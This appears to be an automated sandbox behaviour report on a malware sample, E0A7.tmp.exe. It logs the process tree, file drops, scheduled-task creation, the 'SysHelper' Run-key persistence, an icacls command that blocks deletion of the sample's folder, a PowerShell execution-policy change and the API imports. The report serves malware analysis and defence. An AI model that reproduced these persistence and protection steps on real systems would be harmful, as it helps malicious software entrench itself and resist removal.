9c17cc38...7a59

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x8e8	Analysis Target	High (Elevated)	e0a7.tmp.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe"	-
#3	0xa48	Child Process	High (Elevated)	icacls.exe	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff" /deny *S-1-1-0:(OI)(CI)(DE,DC)	#1
#4	0x50c	Created Scheduled Job	High (Elevated)	taskeng.exe	taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]	#1
#5	0xa5c	Child Process	High (Elevated)	e0a7.tmp.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe" --Admin IsNotAutoStart IsNotTask	#1
#6	0xabc	Child Process	High (Elevated)	updatewin1.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe"	#5
#7	0xae0	Child Process	High (Elevated)	updatewin1.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe" --Admin	#6
#8	0xaec	Child Process	High (Elevated)	powershell.exe	powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned	#7
#9	0xb1c	Created Scheduled Job	Medium	taskeng.exe	taskeng.exe {47D8EBBE-94FB-44D1-AA0B-8E05701C0CA5} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]	#5
#10	0xb3c	Child Process	Medium	e0a7.tmp.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe" --Task	#9
#12	0xb90	Child Process	High (Elevated)	updatewin2.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe"	#5
#16	0x7ec	Autostart	Medium	e0a7.tmp.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe" --AutoStart	-

Behavior Information - Grouped by Category

Process #1: e0a7.tmp.exe

664

Information	Value
ID	#1
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:37, Reason: Analysis Target
Unmonitor	End Time: 00:01:27, Reason: Self Terminated
Monitor Duration	00:00:50

OS Process Information

Information	Value
PID	0x8e8
Parent PID	0x45c (c:\windows\explorer.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8EC 0x 8F8 0x 8FC 0x 900 0x 904 0x 908 0x 950 0x A40 0x A44 0x A54 0x A58

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
e0a7.tmp.exe	0x00400000	0x004BBFFF	Relevant Image	-	32-bit	-	... Region Actions Download Dump
buffer	0x006B40D8	0x006F5FF3	Marked Executable	-	32-bit	-	... Region Actions Download Dump
buffer	0x006B40D8	0x006F5FF3	Content Changed	-	32-bit	0x006B40D8	... Region Actions Download Dump
e0a7.tmp.exe	0x00400000	0x004BBFFF	Process Termination	-	32-bit	-	... Region Actions Download Dump Go to AV Match

Dropped Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	466.00 KB	MD5: 246d6fa957bd9bd9bd444ba8a6c38457 SHA1: fb90a2e9e3f3d4bf350a5c8d475c843f072bc1f5 SHA256: 9c17cc38feddc8aec42f4d7e84ff85260e0e5d955c38e42573a21c18836c7a59 SSDeep: 6144:agBl9KO2wSlnYlm8px3b3RY+F2q9QgW6jw5oJ48ph1nt2EuqAs00:aEKOZSlnbE3b3RiqW6jw5o6831/A	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	466.08 KB	MD5: d9770122fb25a12b797a7d43a954be86 SHA1: 3644d16995d249cbb48022e0dff1565b04bb9b79 SHA256: 0ceb52214f8716182ce44db6017984e5219a6d31a9721992d532f9b60635c3be SSDeep: 6144:r9JciFt0Ku0iZmHXyhVMp7wH/2Uk8px3b3RY+F2q9QgW6jw5oJ48ph1nt2EuqAsQ:r2iIqsf2XE3b3RiqW6jw5o6831/AN	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json	465 bytes	MD5: d6727470681ecc2ca56bbd0486b4fa97 SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613 SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	466.08 KB	MD5: d9770122fb25a12b797a7d43a954be86 SHA1: 3644d16995d249cbb48022e0dff1565b04bb9b79 SHA256: 0ceb52214f8716182ce44db6017984e5219a6d31a9721992d532f9b60635c3be SSDeep: 6144:r9JciFt0Ku0iZmHXyhVMp7wH/2Uk8px3b3RY+F2q9QgW6jw5oJ48ph1nt2EuqAsQ:r2iIqsf2XE3b3RiqW6jw5o6831/AN	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat	64.00 KB	MD5: 54390aef21ce7f2906e890cbb7b75b80 SHA1: 27d6ba3bfe3ccbc3a40812432183f9ee0adaf8cb SHA256: 12ddc7969410447cad2135967f929db2bd56ffeff094c1500c90440199dae935 SSDeep: 192:EpHBC2uWC9ds4MSlSVDzPO2CU13ZdQTWZdaSU6SNfSZSGSwmSrmSDSsNScSeSNSI:A93XxMod0	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	64.00 KB	MD5: e22e6b692abbbee4a7f93d2d17adc9c2 SHA1: 9ad3f8f002b8c1e11e485260832d93bc9d9656fd SHA256: b8efa9109f0be664b0085092fcc1ccfcdad2a3d060ceb2dbd8adc942209f351e SSDeep: 384:qnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:UOLKYBdVZJptKF2KTFZTCzp++8	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB	MD5: 74d69403f4a938faa28298c110bc71c3 SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5 SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9 SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat	256.00 KB	MD5: 6852149628dae385c68c7a9db7028560 SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4 SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG	... File Actions Show Properties Download

Host Behavior

COM (8)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	TaskScheduler	ITaskService	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	TaskScheduler	ITaskService	method_name = Connect, server_name = 95, domain = 95, password = 4289035	1	Fn
Execute	TaskScheduler	ITaskService	method_name = GetFolder, path = \, new_interface = ITaskFolder	1	Fn
Execute	TaskScheduler	ITaskService	method_name = NewTask, new_interface = ITaskDefinition	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Triggers, new_interface = ITriggerCollection	1	Fn
Execute	TaskScheduler	ITriggerCollection	method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger	1	Fn
Execute	TaskScheduler	IDailyTrigger	method_name = put_StartBoundary, start_boundary = 2019-05-06T04:40:12	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Actions, new_interface = IActionCollection	1	Fn

File (9)

Operation	Filename	Additional Information	Count	Logfile
Create Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff	-	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Copy	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	1	Fn
Delete	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe	-	1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = 0, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe" --AutoStart, size = 214, type = REG_EXPAND_SZ	1	Fn

Process (48)

Operation	Process	Additional Information	Count	Logfile
Create	icacls	os_pid = 0xa48, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	show_window = SW_SHOW	1	Fn
Enumerate Processes	-	-	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows sidebar\hk forest representatives.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows media player\highway long.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows portable devices\developing.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sql server compact edition\dumb.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\rainbowallowingsb.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\cowboy_mh.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft office\poison-hormone-geographical.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft visual studio 8\crisis seats.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\java\max poker.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sql server compact edition\amendedbattlefield.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\z stan.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\mozilla firefox\booty pas td.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\origins-capability-snow.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\dvd maker\defines.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sync framework\collinstuition.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\uninstall information\beside-denmark.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\sppsvc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (315)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	3	Fn
Load	RPCRT4.dll	base_address = 0x75ee0000	1	Fn
Load	MPR.dll	base_address = 0x74b40000	1	Fn
Load	WININET.dll	base_address = 0x753d0000	1	Fn
Load	WINMM.dll	base_address = 0x74b00000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	USER32.dll	base_address = 0x74f40000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	ole32.dll	base_address = 0x755e0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75220000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74ae0000	1	Fn
Load	WS2_32.dll	base_address = 0x75bc0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74a80000	1	Fn
Load	CRYPT32.dll	base_address = 0x759b0000	1	Fn
Load	msvcr100.dll	base_address = 0x749c0000	1	Fn
Load	Psapi.dll	base_address = 0x75140000	1	Fn
Load	Shell32.dll	base_address = 0x75fd0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	14	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x76c3588e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x76c349d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75f01635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f21ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f5d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f23fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eff48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74b42dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74b42f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74b43058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x753eab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x7544be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x753eb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x754130f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x753f5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x753ff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x753f9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x74b026e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7535a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7535bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x753545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7534d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x76c3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76c34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x76c317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76c34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76c35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x76c4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76c31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76c35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x76c3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x76c310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x76c5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76c34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x76c5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76c33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76c35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76c31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x76c359e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76c49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76c58baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x76c3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x76c3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x76c5896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x76c5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76c34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x76cb4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x76c389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76c32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x76c4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x76c3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x76c4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76c35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76c34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x76c5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x76c334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
